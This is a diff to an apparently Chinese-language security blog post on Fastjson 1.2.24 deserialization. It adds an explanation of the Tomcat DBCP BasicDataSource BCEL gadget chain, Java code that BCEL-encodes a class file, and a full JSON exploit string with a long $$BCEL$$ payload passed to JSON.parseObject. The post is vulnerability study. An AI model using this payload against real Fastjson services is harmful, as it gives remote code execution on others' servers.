--- a/_posts/2025-4-30-fastjson1.2.24反序列化分析.md
+++ b/_posts/2025-4-30-fastjson1.2.24反序列化分析.md
@@ -283,9 +283,34 @@ ok这个链就结束了，简单吧，下面是构造的exp(代码一)(为什么
     <version>9.0.20</version>
 </dependency>
 ```
+```
+首先我们去看一下BasicDataSource类里面的createConnectionFactory方法里面可以进行类加载并且提供了第三个参数指定类加载器(图一)，
+首先查看这两个参数有没有Setter发现是有的(图二)，接下来查看谁调用createConnectionFactory下来到(图三)接着到(图四)可以看到是个Getter，
+现在流程已经出来了，接着我们看到ClassLoader类的加载器(图5)，forName会调loadclass,这里强烈建议大家跟一下这里不然真不好理解，
+下面就是必须是$$BCEL$$开头还有在进行加密一下createClass里面进行了解密(图六),下面就直接上exp吧(代码一)。
+```
+```java
+byte[] bytes1 = Files.readAllBytes(Paths.get("C:\\Users\\xinyi\\Desktop\\java测试\\Fastjson\\target\\classes\\com\\example\\fastjson\\demos\\web\\Fastjsondome.class"));
+String encode1 = Utility.encode(bytes1, true);
+System.out.println(encode1);
+String s = "{\"@type\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\"driverClassName\":\"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5U$5dS$hU$Y$7e$W$C$bb$J$9b$96$d2$S$a0$60$f9$a8$b6$40$g$a2X$3fJh$x$adE$d2$f2e$83T$ac_$t$c9$B$W$b3$bb$99$ecb$e9$9d$X$ce$e8$ad$X$ce$f4$ca$f1$ce$hgl$3b$zu$ec$a8$f7$fe$P$99$f1O8$3eg$b3$84$UR$i$c7$cc$e4$9c$bc$ef9$fb$bc$cf$f3$bco$92$3f$fe$fe$e57$A$e7Q$8c$a1$H$93Q$5c$c4$r$D$97cx$LS$3a$ae$c4$d0$82I$b5$5cU$cb$dbj$b9f$60$3a$8an$bcc$me$60F$7d$cc$g$b8$ae$f6$h$G$c6c$98$c5$9c$81y$b5$_$e8X$d4$f1n$M$J$dc$d4$91$d3$b1$a4$n$e2$I$5bj$e8$98$dd$Q$9f$8btI8k$e9$9c_$b1$9c$b5$8c$86$9e$9b$9b$8eo$d9r$d9$f2$ac$7cIN9$8e$eb$L$dfr$jOCr$b6$e0$daiQ$b2$f2$o$_$d2$ab$c2$f37$3c$d7I$8b$da$9d$f4$f5$dc$c2$fc$b4$rKE$o$b5$ae$ba$V$5b$f8$g$8e$df$e5$x57$97$w$W$Hff$sl$7b$c2$pX$b3$t$b7$b8$8a52$d1$b2$bc$3ei9$96$7f$89$a9$e1$91er$bc$ea$Wyrt$d6r$e4$fc$a6$9d$97$95$rA$3e$8a$b5$5b$Q$a5eQ$b1T$i$s$p$fe$baE$ccT$40Pn$J$bb$5c$92$7b$E$8b$d2v$bd$f4$j$99OO$87$a9$a2kKRL$M$l$b4$m$ab$aaG$d7$a4$3f$r$d4K$c3$89$e1$91FF$b5z$d2$cf$v$J$9d$N$40$U$86N$8c$f9$c0$e8V$85$a6tRZ$b6$fad$QF$86$83b$ba$b7$7b$d1$98$y$94B$X4$86$9dU$60$cbMg$X$aem$VdYy$cc$d2$f1$9c$_$K$9f$cd$89r$a0$9e$N$d6$Q$cb$b9$9b$95$82$9c$b6$94$h$c7$eae$8e$v$M$T$a7$f1$a2$8e$f7L$y$e3$W$3d$dc$f9$fa$9b$9d$7b$3f$ed$7c$f7$e5__$7c$ff$e7W$bf$ee$7c$7b_$c7$fb$sV0$a6$a1k$bf$9a$x$9bV$a9$u$x$s$3e$c0m$b5$7ch$e2$p$9c$d3$d0FY$o$7c$99$Y$40$_$F$84$9a$93$sN$aaX$af$wg8$88$n$j$l$9b$f8$E$9fR8$3bX0$n$90$e7t4$d0$a8$e1$e4$k$89p$mk$87JK$81$c3$f8$lZ$ad$a1$7d$Po$n$bf$n$L$fe3$a9$dc$5d$cf$976$fb$e3n$fa$f5$b6$_R$beO$T$a4$b03uL$eb$d2$94XVQ$89$9c$5bE$b9$y$9d$o$c7$b0$d1D$iH$85$b6$S$b8$8fsp$c8$b1$e1$bb$d5$U$3b$7b$c0$W$b6$9e$k$d7$82$ceg$865L$T$p$o$b7$qM$3b$fb$_$cc$W$xnAz$k$l$e8$ae$bf$b9$b4$5eq$ef$a8Y$e3$60$b3$93$dd$fc$99$C$9a$d1$a4$9a$M$f2g$d4$c6$fd$F$beOy$e8$e7$B$a7$81$c9$s$d5v$eeQ$kp$A$b9$be$c4$e82$f3$g$f7$f8$e8$Th$P$d1$d4$d1$bc$8d$c8$83$e0$fa$Z$aeG$88$M$9cB$84$40j$ac$ce22$ab$P$60$Y$p$dc$V$d8h$I$b6$ce$db$ea$feP$I$f6$U$z$xO$d0$aa0$f5$q$df$7d$db0$b6$RmPa$90$V$86$b8$9e$O$w$MTQ$c2$K$eaSU$h$82$3bC$B$e5$q$ce$85U3$bb$S$U$fd$Y$c1G$l$a1$ed$7e$ad$40$8c$3bx$d1$60$d4$88$7e$Kc$n$d0$ed$c0F$a0$bf$8e$ba$ZR$af$d2$kM$3eF$db$7e$ee$p$ec$c0$u$3dJ$G$f0$89$wD$8d$7b$7f$60$3f$7fC$90$ae1$5e$e0s$8a$c4$60$5d$a18$8b$90$f8$91$bdZ$M$f6$abH$b1$bdcu$w$Gk$w$5e$c6$x$87$80$l$ad$82$b7$d7$fcW$c1$8f$fb$c0$c7$J$fejC$f0q$e6$9fo$d11$82$f7$ee$n$f7$3eF$fb$7e$8b$de$a0Eo$d2$a2$L$cf$b1H5UYt$fe$ff$W$ca$a8$3fm$W$baxh$n$D$af$d5$be$A$ab$a1$5d$5d$3f$a3$a3$e3$f86N$dc$fa$B$f1$hO$91X$e1$Qw$fd$fe$m8$8c$d2$92N$5e$3c$T$80$b6p$eda$ae$P$ea$975$ce$f6$s$f8u$db5$$$ce$93$d7$a9$YT$M$e8h$9a$d5qA$7d$e9$s$C$ae$99$7f$A$Lp$UIb$I$A$A\",\"driverClassLoader\":{\"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"}}";
+JSON.parseObject(s);
+```
+![](https://xinyisleep.github.io/img/2025/fastjson/fastjson1.2.24/28.png)
+
+![](https://xinyisleep.github.io/img/2025/fastjson/fastjson1.2.24/29.png)
+
+![](https://xinyisleep.github.io/img/2025/fastjson/fastjson1.2.24/30.png)
+
+![](https://xinyisleep.github.io/img/2025/fastjson/fastjson1.2.24/31.png)
+
+![](https://xinyisleep.github.io/img/2025/fastjson/fastjson1.2.24/32.png)
+
+![](https://xinyisleep.github.io/img/2025/fastjson/fastjson1.2.24/33.png)
 
 ```
-明天再写
-
+上面就是fastjson1.2.24的常见的两种打法，当然好用的还是jndi的打法，
+还有一种打法只存在理论和学习，就是之前我们学习cb链的时候会调用了Getter(getOutputProperties),
+后面我也会加上还有其他的打法也会加上，五一了大家节日快乐我也休息几天，后面继续向前学习大家一起进步。
 ```
 
